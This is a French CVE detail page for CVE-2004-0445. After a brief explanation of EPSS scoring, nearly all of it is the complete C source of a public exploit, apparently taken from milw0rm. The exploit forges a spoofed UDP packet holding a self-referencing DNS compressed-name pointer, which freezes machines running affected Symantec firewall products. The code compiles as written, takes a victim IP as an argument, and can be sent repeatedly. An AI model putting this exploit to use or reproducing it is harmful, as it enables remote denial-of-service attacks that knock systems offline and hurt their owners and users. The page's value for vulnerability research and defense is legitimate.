CVE-2004-0445 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* HOD-symantec-firewall-DoS-expl.c: * * Symantec Multiple Firewall DNS Response Denial-of-Service * * Exploit version 0.1 coded by * * * .::[ houseofdabus ]::. * * * * Bug discoveried by eEye: * http://www.eeye.com/html/Research/Advisories/AD20040512B.html * * ------------------------------------------------------------------- * Tested on: * - Symantec Norton Personal Firewall 2004 * * * Systems Affected: * - Symantec Norton Internet Security 2002 * - Symantec Norton Internet Security 2003 * - Symantec Norton Internet Security 2004 * - Symantec Norton Internet Security Professional 2002 * - Symantec Norton Internet Security Professional 2003 * - Symantec Norton Internet Security Professional 2004 * - Symantec Norton Personal Firewall 2002 * - Symantec Norton Personal Firewall 2003 * - Symantec Norton Personal Firewall 2004 * - Symantec Client Firewall 5.01, 5.1.1 * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1) * - Symantec Norton AntiSpam 2004 * * ------------------------------------------------------------------- * Description: * eEye Digital Security has discovered a second vulnerability * in the Symantec firewall product line that can be remotely * exploited to cause a severe denial-of-service condition on * systems running a default installation of an affected version * of the product. By sending a single malicious DNS (UDP port 53) * response packet to a vulnerable host, an attacker can cause * the Symantec DNS response validation code to enter an infinite * loop within the kernel, amounting to a system freeze that requires * the machine to be physically rebooted in order to restore operation. * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] * * -fi:IP From (sender) IP address * -tp:int To (recipient) port number * -ti:IP To (recipient) IP address * -n:int Number of times to send message * */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> #include <ws2tcpip.h> /* IP_HDRINCL */ #include <stdio.h> #include <stdlib.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif #define MAX_MESSAGE 4068 #define MAX_PACKET 4096 #define DEFAULT_PORT 53 #define DEFAULT_IP "10.0.0.1" #define DEFAULT_COUNT 1 #ifndef _WIN32 # define FAR #endif /* Define the DNS header */ char dnsreply[] = "\xc9\x9c" /* Transaction ID */ "\x80\x00" /* Flags (bit 15: response) */ "\x00\x01" /* Number of questions */ "\x00\x01" /* Number of answer RRs */ "\x00\x00" /* Number of authority RRs */ "\x00\x00" /* Number of additional RRs */ "\xC0\x0C"; /* Compressed name pointer to itself */ /* Define the IP header */ typedef struct ip_hdr { unsigned char ip_verlen; /* IP version & length */ unsigned char ip_tos; /* IP type of service */ unsigned short ip_totallength; /* Total length */ unsigned short ip_id; /* Unique identifier */ unsigned short ip_offset; /* Fragment offset field */ unsigned char ip_ttl; /* Time to live */ unsigned char ip_protocol; /* Protocol */ unsigned short ip_checksum; /* IP checksum */ unsigned int ip_srcaddr; /* Source address */ unsigned int ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR, FAR* LPIP_HDR; /* Define the UDP header */ typedef struct udp_hdr { unsigned short src_portno; /* Source port number */ unsigned short dst_portno; /* Destination port number */ unsigned short udp_length; /* UDP packet length */ unsigned short udp_checksum; /* UDP checksum (optional) */ } UDP_HDR, *PUDP_HDR; /* globals */ unsigned long dwToIP, // IP to send to dwFromIP; // IP to send from (spoof) unsigned short iToPort, // Port to send to iFromPort; // Port to send from (spoof) unsigned long dwCount; // Number of times to send char strMessage[MAX_MESSAGE]; // Message to send void usage(char *progname) { printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -tp:int To (recipient) open UDP port number:\n"); printf(" 137, 138, 445, 500(default)\n"); printf(" -ti:IP To (recipient) IP address\n"); printf(" -n:int Number of times\n"); exit(1); } void ValidateArgs(int argc, char **argv) { int i; iToPort = 500; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; memcpy(strMessage, dnsreply, sizeof(dnsreply)-1); for(i = 1; i < argc; i++) { if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; unsigned long i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n"); printf("Bug discoveried by eEye:\n"); printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 3) usage(argv[0]); /* Parse command line arguments and print them out */ ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); printf("[*] Count: %d\n", dwCount); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); printf("[*] Count: %d\n", dwCount); #endif #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { printf("[-] WSASocket() failed: %d\n", WSAGetLastError()); return -1; } #endif /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */ ipHdr.ip_id = 0; /* Unique identifier: set to 0 */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 128; /* Time to live */ ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */ ipHdr.ip_checksum = 0 ; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ /* Initalize the UDP header */ iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1; udpHdr.src_portno = htons(iFromPort) ; udpHdr.dst_portno = htons(iToPort) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; memset(buf, 0, MAX_PACKET); memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++) *ptr = strMessage[i]; iUdpChecksumSize += sizeof(dnsreply)-1; cksum = checksum((unsigned short *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, sizeof(dnsreply)-1); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; for(i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); if (ret == SOCKET_ERROR) { printf("[-] sendto() failed: %d\n", WSAGetLastError()); break; } else #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif printf("[+] sent %d bytes\n", ret); } #ifdef _WIN32 closesocket(s); WSACleanup(); #endif return 0; } // milw0rm.com [2004-05-16]